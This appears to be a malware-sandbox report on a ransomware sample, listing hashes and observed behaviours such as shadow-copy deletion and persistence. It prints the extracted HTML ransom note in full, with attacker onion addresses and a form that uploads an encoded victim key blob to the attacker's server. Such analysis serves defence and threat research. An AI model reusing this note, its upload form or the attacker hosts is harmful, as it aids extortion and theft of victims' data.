General

  • Target

    RNSM00312.7z

  • Size

    2.2MB

  • Sample

    241112-yp2vvaypbv

  • MD5

    81948ac7307816c1e33385c3f7d8fa53

  • SHA1

    6e1b6fa3ee72926a6c8213e5ab1f6f4d89aeedaf

  • SHA256

    4f5e0c01a276680e6d960984692c3e1cc5b4a36955db0322dedd93f3d1e3a546

  • SHA512

    497a63704be54cae6fd6b2766fa25f0af5b53c1cd5f38133b1e688022e97eb80544163477a4fe5a1867700d6132cd0c4d40f4a524ede091e52cced40ba41036b

  • SSDEEP

    49152:L1kNO/v4ThoYQ4AR2cJpGrge/aH8psuKYCC:yEqoYiwaQfh

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/BCXRJFKE_6A57DF960BC14B256522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/BCXRJFKE_6A57DF960BC14B256522DF69/">http://lockerrwhuaf2jjx.onion.sx/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/BCXRJFKE_6A57DF960BC14B256522DF69/">http://lockerrwhuaf2jjx.onion.link/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/BCXRJFKE_6A57DF960BC14B256522DF69/">https://lockerrwhuaf2jjx.onion.rip/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/BCXRJFKE_6A57DF960BC14B256522DF69/">https://lockerrwhuaf2jjx.onion.to/BCXRJFKE_6A57DF960BC14B256522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Targets

    • Target

      RNSM00312.7z

    • Size

      2.2MB

    • MD5

      81948ac7307816c1e33385c3f7d8fa53

    • SHA1

      6e1b6fa3ee72926a6c8213e5ab1f6f4d89aeedaf

    • SHA256

      4f5e0c01a276680e6d960984692c3e1cc5b4a36955db0322dedd93f3d1e3a546

    • SHA512

      497a63704be54cae6fd6b2766fa25f0af5b53c1cd5f38133b1e688022e97eb80544163477a4fe5a1867700d6132cd0c4d40f4a524ede091e52cced40ba41036b

    • SSDEEP

      49152:L1kNO/v4ThoYQ4AR2cJpGrge/aH8psuKYCC:yEqoYiwaQfh

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

    • Contacts a large (773) amount of remote hosts

      This may indicate a network scan to discover remotely running services.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

MITRE ATT&CK Enterprise v15

Tasks